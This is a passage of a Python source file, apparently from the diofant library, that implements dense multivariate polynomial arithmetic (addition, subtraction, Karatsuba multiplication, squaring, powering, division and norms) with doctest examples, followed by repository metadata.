    x**2 + 1

    >>> R.dup_rshift(x**4 + x**2 + 2, 2)
    x**2 + 1
    """
    # f[:-n] is wrong for n == 0 (it would drop every coefficient), so
    # compute the split point explicitly instead.
    return f[:len(f) - n]
def dmp_abs(f, u, K):
    """
    Make all coefficients positive in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_abs(x**2*y - x)
    x**2*y + x
    """
    if u:
        v = u - 1
        return [dmp_abs(cf, v, K) for cf in f]
    return [abs(cf) for cf in f]
def dmp_neg(f, u, K):
    """
    Negate a polynomial in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_neg(x**2*y - x)
    -x**2*y + x
    """
    if u:
        v = u - 1
        return [dmp_neg(cf, v, K) for cf in f]
    return [-cf for cf in f]
def dup_add(f, g, K):
    """
    Add dense polynomials in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)

    >>> R.dmp_add(x**2 - 1, x - 2)
    x**2 + x - 3
    """
    if not f:
        return g
    if not g:
        return f

    df = dmp_degree_in(f, 0, 0)
    dg = dmp_degree_in(g, 0, 0)

    if df == dg:
        # Equal degrees: leading terms may cancel, so strip the result.
        return dmp_strip([a + b for a, b in zip(f, g)], 0)

    # Split the higher-degree head off the longer operand; only the
    # overlapping tails are added term-wise.
    k = abs(df - dg)
    if df > dg:
        head, f = f[:k], f[k:]
    else:
        head, g = g[:k], g[k:]
    return head + [a + b for a, b in zip(f, g)]
def dmp_add(f, g, u, K):
    """
    Add dense polynomials in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)

    >>> R.dmp_add(x**2 + y, x**2*y + x)
    x**2*y + x**2 + x + y
    """
    if not u:
        return dup_add(f, g, K)

    df = dmp_degree_in(f, 0, u)
    if df < 0:
        return g

    dg = dmp_degree_in(g, 0, u)
    if dg < 0:
        return f

    v = u - 1

    if df == dg:
        # Equal degrees: leading coefficients may cancel, so strip.
        return dmp_strip([dmp_add(a, b, v, K) for a, b in zip(f, g)], u)

    # Split the higher-degree head off the longer operand; only the
    # overlapping tails are added coefficient-wise.
    k = abs(df - dg)
    if df > dg:
        head, f = f[:k], f[k:]
    else:
        head, g = g[:k], g[k:]
    return head + [dmp_add(a, b, v, K) for a, b in zip(f, g)]
def dup_sub(f, g, K):
    """
    Subtract dense polynomials in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)
    >>> R.dmp_sub(x**2 - 1, x - 2)
    x**2 - x + 1
    """
    if not f:
        return dmp_neg(g, 0, K)
    if not g:
        return f

    df = dmp_degree_in(f, 0, 0)
    dg = dmp_degree_in(g, 0, 0)

    if df == dg:
        # Equal degrees: leading terms may cancel, so re-normalize.
        return dmp_strip([a - b for a, b in zip(f, g)], 0)

    k = abs(df - dg)
    if df > dg:
        # Leading part of f passes through unchanged.
        head, f = f[:k], f[k:]
    else:
        # Leading part of g appears negated in the difference.
        head, g = dmp_neg(g[:k], 0, K), g[k:]
    return head + [a - b for a, b in zip(f, g)]
def dmp_sub(f, g, u, K):
    """
    Subtract dense polynomials in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_sub(x**2 + y, x**2*y + x)
    -x**2*y + x**2 - x + y
    """
    if not u:
        return dup_sub(f, g, K)

    df = dmp_degree_in(f, 0, u)
    if df < 0:
        # f is zero: the difference is just -g.
        return dmp_neg(g, u, K)
    dg = dmp_degree_in(g, 0, u)
    if dg < 0:
        return f

    v = u - 1
    if df == dg:
        # Equal degrees: leading coefficients may cancel, re-normalize.
        return dmp_strip([dmp_sub(a, b, v, K) for a, b in zip(f, g)], u)

    k = abs(df - dg)
    if df > dg:
        # Leading part of f passes through unchanged.
        head, f = f[:k], f[k:]
    else:
        # Leading part of g appears negated in the difference.
        head, g = dmp_neg(g[:k], u, K), g[k:]
    return head + [dmp_sub(a, b, v, K) for a, b in zip(f, g)]
def dmp_add_mul(f, g, h, u, K):
    """
    Return ``f + g*h`` where ``f, g, h`` are in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_add_mul(x**2 + y, x, x + 2)
    2*x**2 + 2*x + y
    """
    product = dmp_mul(g, h, u, K)
    return dmp_add(f, product, u, K)
def dmp_sub_mul(f, g, h, u, K):
    """
    Return ``f - g*h`` where ``f, g, h`` are in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_sub_mul(x**2 + y, x, x + 2)
    -2*x + y
    """
    product = dmp_mul(g, h, u, K)
    return dmp_sub(f, product, u, K)
def dup_mul_karatsuba(f, g, K):
    """
    Multiply dense polynomials in ``K[x]`` using Karatsuba's algorithm.

    Each operand is split at degree ``half``; three half-size products
    replace the four a schoolbook split would need.

    References
    ==========

    * :cite:`Hoeven02`
    """
    n = max(dmp_degree_in(f, 0, 0), dmp_degree_in(g, 0, 0)) + 1
    half = n//2

    # Split f = f_hi*x**half + f_lo, and likewise for g.
    f_lo = dmp_slice_in(f, 0, half, 0, 0, K)
    g_lo = dmp_slice_in(g, 0, half, 0, 0, K)
    f_hi = dup_rshift(dmp_slice_in(f, half, n, 0, 0, K), half, K)
    g_hi = dup_rshift(dmp_slice_in(g, half, n, 0, 0, K), half, K)

    lo = dup_mul(f_lo, g_lo, K)
    hi = dup_mul(f_hi, g_hi, K)
    # (f_lo + f_hi)*(g_lo + g_hi) - lo - hi yields the cross terms.
    mid = dup_mul(dup_add(f_lo, f_hi, K), dup_add(g_lo, g_hi, K), K)
    mid = dup_sub(mid, dup_add(lo, hi, K), K)

    # Recombine: lo + mid*x**half + hi*x**(2*half).
    shifted_mid = dup_lshift(mid, half, K)
    shifted_hi = dup_lshift(hi, 2*half, K)
    return dup_add(dup_add(lo, shifted_mid, K), shifted_hi, K)
def dup_mul(f, g, K):
    """
    Multiply dense polynomials in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)
    >>> R.dmp_mul(x - 2, x + 2)
    x**2 - 4
    """
    if f == g:
        # Squaring exploits the symmetry of the coefficient products.
        return dup_sqr(f, K)
    if not f or not g:
        return []

    df = dmp_degree_in(f, 0, 0)
    dg = dmp_degree_in(g, 0, 0)

    if max(df, dg) + 1 > query('KARATSUBA_CUTOFF'):
        # Large operands: switch to the asymptotically faster algorithm.
        return dup_mul_karatsuba(f, g, K)

    # Schoolbook convolution: the entry at index i accumulates
    # f[j]*g[i - j] over all in-range j.
    result = []
    for i in range(df + dg + 1):
        acc = K.zero
        for j in range(max(0, i - dg), min(df, i) + 1):
            acc += f[j]*g[i - j]
        result.append(acc)
    return dmp_strip(result, 0)
def dmp_mul(f, g, u, K):
    """
    Multiply dense polynomials in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_mul(x*y + 1, x)
    x**2*y + x
    """
    if not u:
        return dup_mul(f, g, K)
    if f == g:
        # Squaring exploits symmetry of the coefficient products.
        return dmp_sqr(f, u, K)

    df = dmp_degree_in(f, 0, u)
    if df < 0:
        # f is zero; the product is zero as well.
        return f
    dg = dmp_degree_in(g, 0, u)
    if dg < 0:
        return g

    v = u - 1
    result = []
    for i in range(df + dg + 1):
        # Convolution in the outer variable; coefficients live one
        # level down, so use the recursive dmp operations.
        acc = dmp_zero(v)
        for j in range(max(0, i - dg), min(df, i) + 1):
            acc = dmp_add(acc, dmp_mul(f[j], g[i - j], v, K), v, K)
        result.append(acc)
    return dmp_strip(result, u)
def dup_sqr(f, K):
    """
    Square dense polynomials in ``K[x]``.

    Examples
    ========

    >>> R, x = ring('x', ZZ)
    >>> R.dmp_sqr(x**2 + 1)
    x**4 + 2*x**2 + 1
    """
    df = len(f) - 1
    result = []
    for i in range(2*df + 1):
        # The products f[j]*f[i-j] come in symmetric pairs: sum only the
        # first half of the index range, then double the accumulator.
        jmin = max(0, i - df)
        width = min(i, df) - jmin + 1
        jmax = jmin + width//2 - 1

        c = K.zero
        for j in range(jmin, jmax + 1):
            c += f[j]*f[i - j]
        c += c

        if width & 1:
            # Odd number of terms: the middle square f[m]**2 is unpaired.
            c += f[jmax + 1]**2

        result.append(c)
    return dmp_strip(result, 0)
def dmp_sqr(f, u, K):
    """
    Square dense polynomials in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_sqr(x**2 + x*y + y**2)
    x**4 + 2*x**3*y + 3*x**2*y**2 + 2*x*y**3 + y**4
    """
    if not u:
        return dup_sqr(f, K)

    df = dmp_degree_in(f, 0, u)
    if df < 0:
        # f is zero; its square is zero.
        return f

    v = u - 1
    result = []
    for i in range(2*df + 1):
        # Symmetric pairing as in dup_sqr: sum half of the range and
        # double, then add the unpaired middle square when present.
        jmin = max(0, i - df)
        width = min(i, df) - jmin + 1
        jmax = jmin + width//2 - 1

        c = dmp_zero(v)
        for j in range(jmin, jmax + 1):
            c = dmp_add(c, dmp_mul(f[j], f[i - j], v, K), v, K)
        c = dmp_mul_ground(c, K(2), v, K)

        if width & 1:
            c = dmp_add(c, dmp_sqr(f[jmax + 1], v, K), v, K)

        result.append(c)
    return dmp_strip(result, u)
def dmp_pow(f, n, u, K):
    """
    Raise ``f`` to the ``n``-th power in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_pow(x*y + 1, 3)
    x**3*y**3 + 3*x**2*y**2 + 3*x*y + 1
    """
    if not n:
        return dmp_one(u, K)
    if n < 0:
        raise ValueError("can't raise polynomial to a negative power")
    if n == 1 or dmp_zero_p(f, u) or dmp_one_p(f, u, K):
        # Trivial bases/exponents need no work at all.
        return f

    # Binary exponentiation: square-and-multiply over the bits of n.
    result = dmp_one(u, K)
    while n:
        if n & 1:
            result = dmp_mul(result, f, u, K)
        n >>= 1
        if n:
            # Skip the last squaring once all bits are consumed.
            f = dmp_sqr(f, u, K)
    return result
def dmp_div(f, g, u, K):
    """
    Polynomial division with remainder in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_div(x**2 + x*y, 2*x + 2)
    (0, x**2 + x*y)

    >>> R, x, y = ring('x y', QQ)
    >>> R.dmp_div(x**2 + x*y, 2*x + 2)
    (1/2*x + 1/2*y - 1/2, -y + 1)
    """
    # Delegate to the ring implementation: build a throwaway polynomial
    # ring with u + 1 anonymous generators, convert both operands,
    # divide, and convert the quotient/remainder back to dense form.
    ring = K.poly_ring(*[f'_{i}' for i in range(u + 1)])
    q, r = divmod(ring.from_dense(f), ring.from_dense(g))
    return ring.to_dense(q), ring.to_dense(r)
def dmp_rem(f, g, u, K):
    """
    Return polynomial remainder in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_rem(x**2 + x*y, 2*x + 2)
    x**2 + x*y
    >>> R, x, y = ring('x y', QQ)
    >>> R.dmp_rem(x**2 + x*y, 2*x + 2)
    -y + 1
    """
    # Only the remainder component of the division is needed here.
    _, remainder = dmp_div(f, g, u, K)
    return remainder
def dmp_quo(f, g, u, K):
    """
    Return exact polynomial quotient in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_quo(x**2 + x*y, 2*x + 2)
    0
    >>> R, x, y = ring('x y', QQ)
    >>> R.dmp_quo(x**2 + x*y, 2*x + 2)
    1/2*x + 1/2*y - 1/2
    """
    # Only the quotient component of the division is needed here.
    quotient, _ = dmp_div(f, g, u, K)
    return quotient
def dmp_max_norm(f, u, K):
    """
    Return maximum norm of a polynomial in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_max_norm(2*x*y - x - 3)
    3
    """
    if u:
        # Recurse into the coefficients one level down.
        return max(dmp_max_norm(c, u - 1, K) for c in f)
    # Ground level: the zero polynomial (empty list) has norm K.zero.
    return max(dmp_abs(f, 0, K), default=K.zero)
def dmp_l1_norm(f, u, K):
    """
    Return l1 norm of a polynomial in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_l1_norm(2*x*y - x - 3)
    6
    """
    if u:
        # Recurse into the coefficients one level down.
        return sum(dmp_l1_norm(c, u - 1, K) for c in f)
    # Ground level: start from K.zero so the empty sum stays in K.
    return sum(dmp_abs(f, 0, K), K.zero)
def dmp_expand(polys, u, K):
    """
    Multiply together several polynomials in ``K[X]``.

    Examples
    ========

    >>> R, x, y = ring('x y', ZZ)
    >>> R.dmp_expand([x**2 + y**2, x + 1])
    x**3 + x**2 + x*y**2 + y**2
    """
    if not polys:
        # An empty product is the multiplicative identity.
        return dmp_one(u, K)

    it = iter(polys)
    result = next(it)
    for g in it:
        result = dmp_mul(result, g, u, K)
    return result
| {
"repo_name": "skirpichev/omg",
"path": "diofant/polys/densearith.py",
"copies": "1",
"size": "14415",
"license": "bsd-3-clause",
"hash": -2591575587763517000,
"line_mean": 16.8624535316,
"line_max": 74,
"alpha_frac": 0.4096427333,
"autogenerated": false,
"ratio": 2.5773288038619704,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.34869715371619703,
"avg_score": null,
"num_lines": null
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.